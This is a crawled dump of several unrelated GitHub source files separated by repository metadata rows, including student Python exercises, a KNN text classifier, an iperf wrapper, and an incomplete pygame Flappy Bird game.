# forward + backward pass for training
a2 = self.forward(X)
self.backward(X, y, a2)
def saveWeights(self, model):
# we will use the PyTorch internal storage functions
torch.save(model, "NN")
# you can reload model with all the weights and so forth with:
# torch.load("NN")
def predict(self, xPredicted):
print ("Predicted data based on trained weights: ")
# print ("Input (scaled): \n" + str(xPredicted))
print ("Prediction: \n" + str(self.forward(xPredicted)))
| [
"acai21@stanford.edu"
] | acai21@stanford.edu |
f70701fd609628325e07ae636ee846ef48abe1ca | 37f4c86c2a6b45c86aa9544fa8eb2b1846fc30a1 | /Intro_Simple_Functions/Hospital.py | c09eb03a42efa0b234906d01f1320db2725281e8 | [] | no_license | mrbmadrid/Flask_Color_Picker | 2571e9ff62d54c94cd48b7cf4de64ae8ef06c4c3 | 7323e41c6377b3d9eec80984ecb56629e5c11fdd | refs/heads/master | 2020-03-08T23:17:48.004055 | 2018-04-06T19:38:22 | 2018-04-06T19:38:22 | 128,458,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,448 | py | class Patient(object):
def __init__(self, id_num, name, allergies):
self.id = id_num
self.name = name
self.allergies = allergies
self.bed_num = -1
def display(self):
print str(self.id), self.name, self.allergies, str(self.bed_num)
class Hospital(object):
def __init__(self, name, capacity):
self.name = name
self.capacity = capacity
self.patients = []
for count in range (0, capacity):
self.patients.append("empty")
def admit(self, patient):
index = 0
assigned = False
while(index < self.capacity and not assigned):
if self.patients[index] == "empty":
self.patients[index] = patient
patient.bed_num = index+1
print "Patient "+str(patient.id)+" " + patient.name+" assigned to bed "+str(index+1)+" in "+self.name
assigned = True
index+=1
if not assigned:
print self.name + " is full."
def release(self, name):
for patient in self.patients:
if type(patient) is Patient and patient.name.lower() == name.lower():
patient.bed_num = -1
print "Releasing "+patient.name
self.patients.insert(self.patients.index(patient), "empty")
self.patients.remove(patient)
def display(self):
for patient in self.patients:
if type(patient) is str:
pass
else:
patient.display()
h = Hospital("Tripler", 3)
h.admit(Patient(1, "brian", "mango"))
h.admit(Patient(2, "tim", "none"))
h.admit(Patient(3, "carl", "none"))
h.display()
h.release('Brian')
h.display()
| [
"mrbmadrid@gmail.com"
] | mrbmadrid@gmail.com |
564aff3730d2c16ce344e5ed8c48fcd218d1789c | ac8c31b5971161adf0b7e66d85effd0ec8f5b7dd | /Day 005/video50_E_5_2.py | 2d04f4a560b60b729707bffe0d83d77bd0142f99 | [] | no_license | satuhyva/100daysOfPython | 5f7e7e1959358bcb370f73abe0e5b9627acf01a2 | bdd93c290434aa05bcd52cd96d602bd72acc4a41 | refs/heads/master | 2023-08-17T01:10:35.218447 | 2021-09-20T05:59:15 | 2021-09-20T05:59:15 | 394,317,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # 🚨 Don't change the code below 👇
student_scores = input("Input a list of student scores ").split()
for n in range(0, len(student_scores)):
student_scores[n] = int(student_scores[n])
print(student_scores)
# 🚨 Don't change the code above 👆
#Write your code below this row 👇
highest = -1
for score in student_scores:
if score > highest:
highest = score
print(f"The highest score in the class is: {highest}")
| [
"hyvarinen.satu.i@gmail.com"
] | hyvarinen.satu.i@gmail.com |
213b094346320e7be74f72110762adf43b8b2af4 | 37af8c94c7e47bb9fee08263de8624bc59487735 | /TA(unigram).py | f80a996893176231c9c9fff00eab0c92d6ab5911 | [] | no_license | ilhamksyuriadi/TA | 0b2f046505dcd74f73fd98d88905f75891061317 | 347168d1f786e8a5b02819064a7f9d039b2cdd78 | refs/heads/master | 2020-04-17T11:05:05.398744 | 2019-07-01T15:28:02 | 2019-07-01T15:28:02 | 166,526,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,590 | py | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 16 17:13:44 2018
@author: ilhamksyuriadi
"""
import xlrd
from nltk.tokenize import RegexpTokenizer
from Sastrawi.StopWordRemover.StopWordRemoverFactory import StopWordRemoverFactory
from Sastrawi.Stemmer.StemmerFactory import StemmerFactory
import numpy as np
import math
import time
start_time = time.time()
def LoadDataset(FileLoc):
data = []
label = []
workbook = xlrd.open_workbook(FileLoc)
sheet = workbook.sheet_by_index(0)
count = 0
for i in range(2,sheet.nrows):
data.append(sheet.cell_value(i,0))
label.append([int(sheet.cell_value(i,1)),int(sheet.cell_value(i,2)),int(sheet.cell_value(i,3))])
count += 1
print(count, "data inserted")
return data,label
def Preprocessing(data):
cleanData = []
tokenizer = RegexpTokenizer(r'\w+')
factory_stopwords = StopWordRemoverFactory()
stopwords = factory_stopwords.get_stop_words()
factory_stemmer = StemmerFactory()
stemmer = factory_stemmer.create_stemmer()
count = 0
for i in range(len(data)):
lowerText = data[i].lower()#Case folding
tokenizedText = tokenizer.tokenize(lowerText)#Punctual removal and tokenization
swRemovedText = []#Stopwords removal
for j in range(len(tokenizedText)):
if tokenizedText[j] not in stopwords:
swRemovedText.append(tokenizedText[j])
stemmedText = []
for k in range(len(swRemovedText)):#Stemming
stemmedText.append(stemmer.stem(swRemovedText[k]))
cleanData.append(stemmedText)
count += 1
print(count, "data cleaned")
return cleanData
def CreateUnigram(data):
unigram = []
count = 0
for i in range(len(data)):
for j in range(len(data[i])):
if data[i][j] not in unigram:
unigram.append(data[i][j])
count += 1
print(count, "unigram created")
return unigram
def CreateDF(data,doc):
df = {}
count = 0
for i in range(len(data)):
for j in range(len(doc)):
if data[i] in doc[j]:
if data[i] in df:
df[data[i]] += 1
else:
df[data[i]] = 1
count += 1
print(count, "df created")
return df
def CreateTFIDF(data,df,unigram):
tfidf = []
count = 0
for i in range(len(data)):
tempTfidf = []
for j in range(len(unigram)):
if unigram[j] in data[i]:
tf = 0
for k in range(len(data[i])):
if data[i][k] == unigram[j]:
tf += 1
idf = math.log10(len(data)/df[unigram[j]])
tempTfidf.append(idf*tf)
else:
tempTfidf.append(0)
count += 1
print(count, "tf-idf created")
tfidf.append(tempTfidf)
return tfidf
def Euclidean(a,b):
distance = 0
for i in range(len(a)):
distance = distance + ((a[i]-b[i])**2)
return math.sqrt(distance)
def KnnClassifier(K,train,test,actualLabel,data,cls):
predict = []
for i in range(len(test)):
yes,no = 0,0
distance = []
for j in range(len(train)):
tempDistance = Euclidean(test[i],train[j])
distance.append([tempDistance,int(actualLabel[j])])
distance.sort()
for k in range(K):
if distance[k][1] == 0:
no += 1
elif distance[k][1] == 1:
yes += 1
temp = 2
if yes > no:
predict.append(1)
temp = 1
else:
predict.append(0)
temp = 0
# predict.append(label.index(max(label)))
# predict.append(distance[0])
print("split:",data,",class:",cls,",data ke:",i,"result:",temp)
print("yes:",yes,"no:",no)
return predict
def HammingLoss(actual,predict):
value = 0
for i in range(len(predict)):
a,b,c,x,y,z = 0,0,0,0,0,0
if predict[i][0] == 1 and actual[i][0] == 1:
a = 1
else:
a = 0
if predict[i][1] == 1 and actual[i][1] == 1:
b = 1
else:
b = 0
if predict[i][2] == 1 and actual[i][2] == 1:
c = 1
else:
c = 0
if predict[i][0] == 1 or actual[i][0] == 1:
x = 1
else:
x = 0
if predict[i][1] == 1 or actual[i][1] == 1:
y = 1
else:
y = 0
if predict[i][2] == 1 or actual[i][2] == 1:
z = 1
else:
z = 0
value = value + ((a + b + c) / (x + y +z))
return 1/len(predict)*value
FileLoc = "data.xlsx"
rawData,actualLabel = LoadDataset(FileLoc)
cleanData = Preprocessing(rawData)
unigram = CreateUnigram(cleanData)
df = CreateDF(unigram,cleanData)
dataTfidf = CreateTFIDF(cleanData,df,unigram)
#spliting data
dataTrain1, dataTest1 = dataTfidf[0:798], dataTfidf[798:1064]
labelTrain1 = np.array(actualLabel[0:798])
dataTrain2, dataTest2 = dataTfidf[0:532]+dataTfidf[798:1064], dataTfidf[532:798]
labelTrain2 = np.array(actualLabel[0:532]+actualLabel[798:1064])
dataTrain3, dataTest3 = dataTfidf[0:266]+dataTfidf[532:1064], dataTfidf[266:532]
labelTrain3 = np.array(actualLabel[0:266]+actualLabel[532:1064])
dataTrain4, dataTest4 = dataTfidf[266:1064], dataTfidf[0:266]
labelTrain4 = np.array(actualLabel[266:1064])
predict1A,predict1B,predict1C = [],[],[]
predict2A,predict2B,predict2C = [],[],[]
predict3A,predict3B,predict3C = [],[],[]
predict4A,predict4B,predict4C = [],[],[]
K = 14
#iteration for classify the data
for i in range(4):
if i == 0:
predict1A = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,0],1,"anjuran")
predict1B = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,1],1,"larangan")
predict1C = KnnClassifier(K,dataTrain1,dataTest1,labelTrain1[:,2],1,"informasi")
elif i == 1:
predict2A = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,0],2,"anjuran")
predict2B = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,1],2,"larangan")
predict2C = KnnClassifier(K,dataTrain2,dataTest2,labelTrain2[:,2],2,"informasi")
elif i == 2:
predict3A = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,0],3,"anjuran")
predict3B = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,1],3,"larangan")
predict3C = KnnClassifier(K,dataTrain3,dataTest3,labelTrain3[:,2],3,"informasi")
else:
predict4A = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,0],4,"anjuran")
predict4B = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,1],4,"larangan")
predict4C = KnnClassifier(K,dataTrain4,dataTest4,labelTrain4[:,2],4,"informasi")
predictA = predict4A + predict3A + predict2A + predict1A
predictB = predict4B + predict3B + predict2B + predict1B
predictC = predict4C + predict3C + predict2C + predict1C
predict = []
for i in range(len(predictA)):
predict.append([predictA[i],predictB[i],predictC[i]])
hammingLost = HammingLoss(actualLabel,predict)
print(round(hammingLost*100,2),"%")
print("--- %s seconds ---" % (time.time() - start_time))
#code below for count actual and predict each class
anjuranActual0, anjuranActual1 = 0,0
laranganActual0, laranganActual1 = 0,0
informasiActual0, informasiActual1 = 0,0
anjuranPredict0, anjuranPredict1 = 0,0
laranganPredict0, laranganPredict1 = 0,0
informasiPredict0, informasiPredict1 = 0,0
for i in range(len(predict)):
if actualLabel[i][0] == 0:
anjuranActual0 += 1
if actualLabel[i][0] == 1:
anjuranActual1 += 1
if actualLabel[i][1] == 0:
laranganActual0 += 1
if actualLabel[i][1] == 1:
laranganActual1 += 1
if actualLabel[i][2] == 0:
informasiActual0 += 1
if actualLabel[i][2] == 1:
informasiActual1 += 1
if predict[i][0] == 0:
anjuranPredict0 += 1
if predict[i][0] == 1:
anjuranPredict1 += 1
if predict[i][1] == 0:
laranganPredict0 += 1
if predict[i][1] == 1:
laranganPredict1 += 1
if predict[i][2] == 0:
informasiPredict0 += 1
if predict[i][2] == 1:
informasiPredict1 += 1
| [
"noreply@github.com"
] | noreply@github.com |
89a5d4dbe3fcb3d203ce377c78cc21872e3748e3 | a5d53e75eb34639b3c17772ad610c73e3cf935d6 | /pep234.py | 2ff0ddf3151d70752a1ea01c508a43c8c3c9ceed | [] | no_license | pkral78/lf_async_python | 42100f5b1039aedcf11828d81695db20400ea932 | 06c7ffa48267db062b341a2001879d563fd511b0 | refs/heads/master | 2023-01-09T03:41:34.205932 | 2020-11-13T14:31:18 | 2020-11-13T14:31:18 | 312,598,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | class even_iter:
def __init__(self, iterable):
self.iter = iter(iterable)
def __iter__(self):
return self
def __next__(self):
ret = next(self.iter)
try:
next(self.iter)
except StopIteration:
pass
return ret
a = [i for i in range(0, 10)]
print(a)
print([i for i in iter(a)])
print(iter(even_iter(a)))
print([i for i in even_iter(a)])
| [
"pavel.kral@gmail.com"
] | pavel.kral@gmail.com |
5c9589687551433145ec1f6425524429354fc77d | 75c653bbe8c919ff2ebe315fc24434f5cbce8d44 | /solver/settings.py | f8925afe8d608b5843089b04010897c85fe4a0ba | [] | no_license | piotrgajdzica/math-trade-solver | 5d7953c98595ea022fe713c244c1b60d71ee3113 | 7f8faa566a9c3c9dbeca462d50a2af60150a718a | refs/heads/master | 2020-03-18T09:21:30.381018 | 2018-12-06T13:37:24 | 2018-12-06T13:37:24 | 134,559,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | group_prefix = "g"
element_prefix = "e"
| [
"p.gajdzica@labmatic.com"
] | p.gajdzica@labmatic.com |
4cfebf29e214868e5123ed92585040660fa48191 | d5b232efefd93d9ec0ee2014fcd22400dd2459a2 | /Python/multiprocessing/ex6_queue.py | 7cb3a117cd0d6d4224c160d43ef96291b33d9304 | [] | no_license | joohee/DailyCoding | cdac39a2362ec9a2e91a7f724c59e632167f45b7 | 9746628408ea269f696a15e84869ed5f16cca7f0 | refs/heads/master | 2020-04-06T13:53:58.785499 | 2016-10-27T06:39:32 | 2016-10-27T06:39:32 | 48,873,598 | 0 | 1 | null | 2016-03-03T06:24:54 | 2016-01-01T08:45:45 | Python | UTF-8 | Python | false | false | 216 | py | from multiprocessing import Process, Queue
def f(q):
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = Queue()
p = Process(target=f, args=(q,))
p.start()
print(q.get())
p.join()
| [
"neigie@gmail.com"
] | neigie@gmail.com |
69ba12d03ccafd8bcc5cf81900c9c8eaceb3f501 | 1fea2c8a6fcceb58caa4caa7bea4b9140bca5749 | /src/process_data.py | 87d42c9b65d4a7d3a642b6bd9f9549934dc7316a | [] | no_license | iamaziz/queue-system | 19691881b149e0420ca80925adf19a0d7d9b8ff1 | 00087f502db597cc2114c1cc254ad60c598e015a | refs/heads/master | 2020-05-17T23:53:56.447626 | 2015-10-16T00:58:28 | 2015-10-16T00:58:28 | 42,259,668 | 5 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py |
import pandas as pd
import matplotlib.pyplot as plt
in_file = 'per-patient-data.csv'
data = pd.DataFrame.from_csv(in_file, index_col=False)
# aggregate raw per-individual patients dataset
def daily_ticks():
days = set( data.AdmitDay )
total = 0
icroom = 0
day_total = {}
for d in sorted(days):
'''
total patients per a day = admit + still - leave
return:
{'day_date': [n_admitted, n_leaving, n_admitted_to_ICU, n_leaving_ICU, total_in_ICU, total_in_hospital]}
'''
came = len( data[ data.AdmitDay == d ] )
left = len( data[ data.LeaveDay == d ] )
total += came
total -= left
inicu = len( data[ (data.AdmitDay == d) & (data.ICRoom == 'yes') ] )
outicu = len( data[ (data.LeaveDay == d) & (data.ICRoom == 'yes') ] )
icroom += inicu
icroom -= outicu
day_total[d] = [came, left, inicu, outicu, icroom, total]
return day_total
# write the processed data into a csv file
import csv
out_file = 'per-day-data.csv'
with open(out_file, 'w') as csvfile:
a = csv.writer(csvfile, delimiter=',')
a.writerow(['Date', 'InPatients', 'OutPatients', 'InICU', 'OutICU', 'ICUroomTotal', 'OverallTotal'])
entries = daily_ticks()
for k, v in sorted( entries.items() ):
row = []
row.append(k)
pin, pout, icuin, icuout, picu, ptotal = v
row.append(pin)
row.append(pout)
row.append(icuin)
row.append(icuout)
row.append(picu)
row.append(ptotal)
a.writerow(row)
print('processed the per-patient dataset:\n\t{}\nand generated the aggregated new dataset into:\n\t{}'.format(in_file, out_file)) | [
"iamaziz.alto@gmail.com"
] | iamaziz.alto@gmail.com |
153d4d409dd7f93f7c62b1eefadb07baeb56dccf | 06afde537edeccf393106a95e4d6e03b164b03bf | /airline/flights/migrations/0004_passenger.py | e0e2968093a393f39b75730d8b54a46c7ba829e2 | [] | no_license | moustafamahdy/MyProjects | 025eced26ee5c8eebbc396c764e5ccfdc8739b8c | 51943815004dfc4450d5c3b95a0f58c5c8060928 | refs/heads/master | 2023-05-13T01:20:26.409788 | 2021-05-30T09:05:01 | 2021-05-30T09:05:01 | 371,940,183 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | # Generated by Django 3.1.7 on 2021-05-23 12:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('flights', '0003_auto_20210523_1057'),
]
operations = [
migrations.CreateModel(
name='Passenger',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first', models.CharField(max_length=64)),
('last', models.CharField(max_length=64)),
('flights', models.ManyToManyField(blank=True, related_name='passengers', to='flights.Flight')),
],
),
]
| [
"moustafa.cena1997@gmail.com"
] | moustafa.cena1997@gmail.com |
f9316f11cad08f96cbfe0273ec66617794c9de3d | 635ad5c4fe923ce67619f5275f2a4fa35882676a | /assignment_6/src/markov_model.py | b545e774c05aefe99f410da34d02dc683bf8b088 | [] | no_license | justinbrush702/bioinformatics | 1441530e0ca405df1470b6fd336c4e4449405ccf | 778fddc9659b61eb9d9d5014853ad1acb1b8bd6c | refs/heads/master | 2021-01-11T17:57:51.262903 | 2017-08-07T06:53:26 | 2017-08-07T06:53:26 | 79,883,881 | 0 | 0 | null | 2017-08-07T06:53:27 | 2017-01-24T06:06:51 | Python | UTF-8 | Python | false | false | 433 | py | states = ('Fair', 'Loaded')
observations = ('1', '2', '3', '4', '5', '6')
start_probability = {'Fair': 1.0, 'Loaded': 1.0}
transition_probability = {
'Fair': {'Fair': .95, 'Loaded': .05},
'Loaded': {'Fair': .1, 'Loaded': .9}
}
emission_probability = {
'Fair': {'1': 1.0/6.0, '2': 1.0/6.0, '3': 1.0/6.0, '4': 1.0/6.0, '5': 1.0/6.0, '6': 1.0/6.0},
'Loaded': {'1': .1, '2': .1, '3': .1, '4': .1, '5': .1, '6': .5}
}
| [
"jbrush@pugetsound.edu"
] | jbrush@pugetsound.edu |
5c06b3491ae1c4100e4ad79d68d3243a832be824 | 809d3ec4425c952836cc41386a09d5150e1ef756 | /bbva/apps.py | f8a8764e8b57749e14ef73fc6c3baeef1ffc3619 | [] | no_license | luartony/datawasi_bbva | 9e197694a3f7df451f636f93c18736ad4f86e5d3 | ef630ca177c67c5878f9d65273f2e4f76c85a3f9 | refs/heads/main | 2022-12-30T10:03:41.568777 | 2020-10-18T15:40:37 | 2020-10-18T15:40:37 | 305,002,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class BbvaConfig(AppConfig):
name = 'bbva'
| [
"luartony@gmail.com"
] | luartony@gmail.com |
4cbd2d75e88612f80a7b5d0d48737e6509bdb6e6 | f4c394e57526a4810520b0461f7c23803ab4bbc5 | /hackerrank/intro/arithmeticOperators.py | dc9c563e10df4ebbcff0c28cf10d91c11f624601 | [] | no_license | anandk10/MyPythonPractice | 7a794b5c6ceb926f4bdd94b8f235ac0d788ff6ea | 4b84fe868832aa7d00947d4da2386f536c107293 | refs/heads/master | 2021-01-10T14:30:43.658040 | 2016-02-12T23:41:33 | 2016-02-12T23:41:33 | 51,621,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # Enter your code here. Read input from STDIN. Print output to STDOUT
# Problem link : https://www.hackerrank.com/challenges/python-arithmetic-operators
# Python 2.7
num1 = int(raw_input())
num2 = int(raw_input())
print(num1+num2)
print(num1-num2)
print(num1*num2) | [
"askarand@ads.iu.edu"
] | askarand@ads.iu.edu |
b104d48e41d9130046b0c49a32c62beba8f2a35d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/85/usersdata/179/58876/submittedfiles/funcoes1.py | e9ffe616ef1b13fe73cb6d7961c81ad1912c3af5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | # -*- coding: utf-8 -*-
def crescente(a):
cont=0
for i in range(0,len(a),1):
if a[i]>[i+1]:
cont=cont+1
if cont==len(a):
return(true)
else:
return(false)
def decrescente(a):
cont=0
for i in range(0,len(a),1):
if a[i]<[i+1]:
cont=cont+1
if cont==len(a):
return(true)
else:
return(false)
def consecutivo(a):
cont=0
for i in range(0,len(a),1):
if a[i]==[i+1]:
cont=cont+1
if cont==len(a):
return(true)
else:
return(false)
b=[]
c=[]
d=[]
n=int(input('digite o valor de n :'))
for i in range(0,n,1):
valor=int(input('digite o valor :'))
b.append(valor)
if crescente(b):
print('S')
else:
print('N')
for i in range(0,n,1):
valor=int(input('digite o valor :'))
c.append(valor)
if decrescente(c):
print('S')
else:
print('N')
for i in range(0,n,1):
valor=int(input('digite o valor :'))
d.append(valor)
if consecultivo(d):
print('S')
else:
print('N')
#escreva as demais funções
#escreva o programa principal
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
f774b0b029f5480227625c6e47a5628159a4158a | 80ef10042f32c49254e7e35aebfec0f59b3e8aad | /setup.py | b77d0a540df682d654498cd5c5702d4ab07bdc82 | [] | no_license | liuzheng1990/boto3m | 70a7db42721c729a6674ba85cc7656202939fbe3 | e62ae81bce2e011f0bb0d3ffd8e0f6621366220b | refs/heads/master | 2020-03-26T13:34:34.499278 | 2017-08-20T12:29:55 | 2017-08-20T12:29:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | #!/usr/bin/env python3
import boto3m
import sys
from setuptools import setup, find_packages
install_requires = ['boto3']
setup(name='boto3m',
version=boto3m.__version__,
description="Boto3 multiprocessing extension.",
author="Chase Nicholl",
author_email='me@chasenicholl.com',
url='https://github.com/chasenicholl/boto3m',
packages=find_packages(),
install_requires=install_requires)
| [
"chasenicholl@gmail.com"
] | chasenicholl@gmail.com |
cdaacfbe7fce884d91c74e79e4a520fdf8185bea | 382ce68736c1dee91dcb5eb7846eff10519d2b70 | /etcewrappers/utils/iperfserver.py | f780cf8d9b291281079960623c45cbb9d682bb1a | [] | permissive | adjacentlink/python-etce | 4345c7bd719f18022fdb96b0c30efc529948f87c | 72d58535e230f3178b1cab9616a3412514dabaf3 | refs/heads/master | 2023-08-18T05:08:53.519074 | 2022-11-17T16:47:44 | 2022-11-17T16:47:44 | 103,570,572 | 7 | 4 | BSD-3-Clause | 2022-10-11T11:13:42 | 2017-09-14T19:01:27 | Python | UTF-8 | Python | false | false | 3,528 | py | #
# Copyright (c) 2015-2018,2020 - Adjacent Link LLC, Bridgewater, New Jersey
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Adjacent Link LLC nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import, division, print_function
import time
from etce.wrapper import Wrapper
class IPerfServer(Wrapper):
"""
Execute iperf as a server. The iperfserver file should contain, at
most, one line of iperf common and server options. The iperf server
command will be built as 'iperf -s [file options] [arg values]. Lines
starting with "#" is ignored as comments. If multiple non-comment
lines are found, only the last one is used.
"""
def register(self, registrar):
registrar.register_infile_name('iperfserver.conf')
registrar.register_outfile_name('iperfserver.log')
registrar.register_argument(
'interval',
None,
'iperf measurement interval (iperf -i switch ' \
'argument)')
registrar.register_argument(
'bufferlen',
None,
'iperf buffer length (iperf -l switch argument)')
def run(self, ctx):
if not ctx.args.infile:
return
# run as daemon, log to output file and add argument specified via input file
argstr = '-D -o %s' % ctx.args.outfile
if ctx.args.interval is not None:
argstr += ' -i %d ' % ctx.args.interval
if ctx.args.bufferlen is not None:
argstr += ' -l %d ' % ctx.args.bufferlen
fileargstr = ''
serverarglines = [line.strip() for line
in open(ctx.args.infile).readlines()
if len(line.strip()) > 0
and line[0] != '#']
# take the last non-comment line as the iperf input
if len(serverarglines) > 0:
fileargstr = serverarglines[-1]
argstr = '-s %s %s' % (fileargstr, argstr)
ctx.run('iperf', argstr)
def stop(self, ctx):
ctx.stop()
# iperfserver takes some time to close down
time.sleep(5)
| [
"eschreiber@adjacentlink.com"
] | eschreiber@adjacentlink.com |
81311fc1eca0f83f3b69ff29b9514f2cf9cd7215 | 010ac0bc179509a77336dcc963c88a9b46117415 | /flappy bird 1.py | 5505ad0e6e1f14b77802b454c6fec81792a428c1 | [] | no_license | quirijnve/flappy-bird-ai | a9464751acde49e362846b802c756c9016fc543e | 5f07f242b32ea5a4a079798a6ec68bffab862285 | refs/heads/master | 2020-12-10T14:44:55.882296 | 2020-01-14T18:03:22 | 2020-01-14T18:03:22 | 233,623,156 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,333 | py | import pygame
import neat
import time
import os
import random
import pickle
pygame.font.init() # init font
WIN_WIDTH = 500
WIN_HEIGHT = 800
GEN = 0
win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
BIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird1.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird2.png"))),
pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bird3.png")))]
PIPE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "pipe.png")))
BASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "base.png")))
BG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join("E:/PY/files/flappy_bird/imgs", "bg.png")))
STAT_FONT = pygame.font.SysFont("comicsansms", 40)
class Bird:
IMGS = BIRD_IMGS
MAX_ROTATION = 25
ROT_VEL = 20
ANIMATION_TIME = 5
def __init__(self, x, y):
self.x = x
self.y = y
self.tilt = 0
self.tick_count = 0
self.vel = 0
self.height = self.y
self.img_count = 0
self.img = self.IMGS[0]
def jump(self):
self.vel = -10.5
self.tick_count = 0
self.height = self.y
def move(self):
self.tick_count += 1
d = self.vel*self.tick_count + 1.5*self.tick_count**2
if d >= (16):
d = 16 #zorgt ervoor dat flappy niet te snel valt
if d < 0:
d -= 2 #als je omhoog gaat hoeveel heid omhoog
self.y =self.y + d
if d < 0 or self.y < self.height + 50:
if self.tilt < self.MAX_ROTATION:
self.tilt = self.MAX_ROTATION #flappy draait wat omhoog
else:
if self.tilt > -90:
self.tilt -= self.ROT_VEL #flappy draait naar beneden
def draw(self, win):
self.img_count += 1
if self.img_count < self.ANIMATION_TIME: #als image count minder is dan 5 laat de eerste flappy bird foto zien
self.img = self.IMGS[0]
elif self.img_count < self.ANIMATION_TIME*2: #als image count meer dan 5 minder is dan 10 laat de tweede flappy bird foto zien
self.img = self.IMGS[1]
elif self.img_count < self.ANIMATION_TIME*3: #als image count meer dan 10 minder is dan 15 laat de laatste flappy bird foto zien
self.img = self.IMGS[2]
elif self.img_count < self.ANIMATION_TIME*4: #als image count meer dan 15 minder is dan 20 laat de tweede flappy bird foto zien
self.img = self.IMGS[1]
elif self.img_count == self.ANIMATION_TIME*4 + 1: #als image count 21 is laat de eerste flappy bird foto zien en reset image count naar 0
self.img = self.IMGS[0]
self.img_count = 0
if self.tilt <= -80:
self.img = self.IMGS[1] #als flappy naar beneden valt laat foto van flappy zien waar de vleugels recht zijn
self.img_count = self.ANIMATION_TIME*2
rotated_image = pygame.transform.rotate(self.img, self.tilt) #zorg ervoor dat de foto van flappy om het midden draaid
new_rect = rotated_image.get_rect(center=self.img.get_rect(topleft = (self.x, self.y)).center)
win.blit(rotated_image, new_rect.topleft)
def get_mask(self):
return pygame.mask.from_surface(self.img) #geeft een lijst waar pixels zijn in de foto
class Pipe:
GAP = 200
VEL = 5
def __init__(self, x):
self.x = x
self.height = 0
self.top = 0 #variable voor waar bovenkant van pipe wordt getekend
self.bottom = 0 #en voor onderkant van pipe
self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True) #foto van pipe opstekop voor boven
self.PIPE_BOTTOM = PIPE_IMG #foto voor beneden pipe
self.passed = False
self.set_height()
def set_height(self):
self.height = random.randrange(50, 450)
self.top = self.height - self.PIPE_TOP.get_height() #zorgt ervoor dat de pipe in goed positie is want top left is de orgin van pijp
self.bottom = self.height + self.GAP
def move(self):
self.x -= self.VEL #flappy gaat vooruit (pipe beweegt naar achter)
def draw(self, win): #teken boven en onder pipe
win.blit(self.PIPE_TOP, (self.x, self.top))
win.blit(self.PIPE_BOTTOM, (self.x, self.bottom))
def collide(self, bird):
bird_mask = bird.get_mask()
top_mask = pygame.mask.from_surface(self.PIPE_TOP) #geeft een lijst waar pixels zijn in de foto
bottom_mask = pygame.mask.from_surface(self.PIPE_BOTTOM) #geeft een lijst waar pixels zijn in de foto
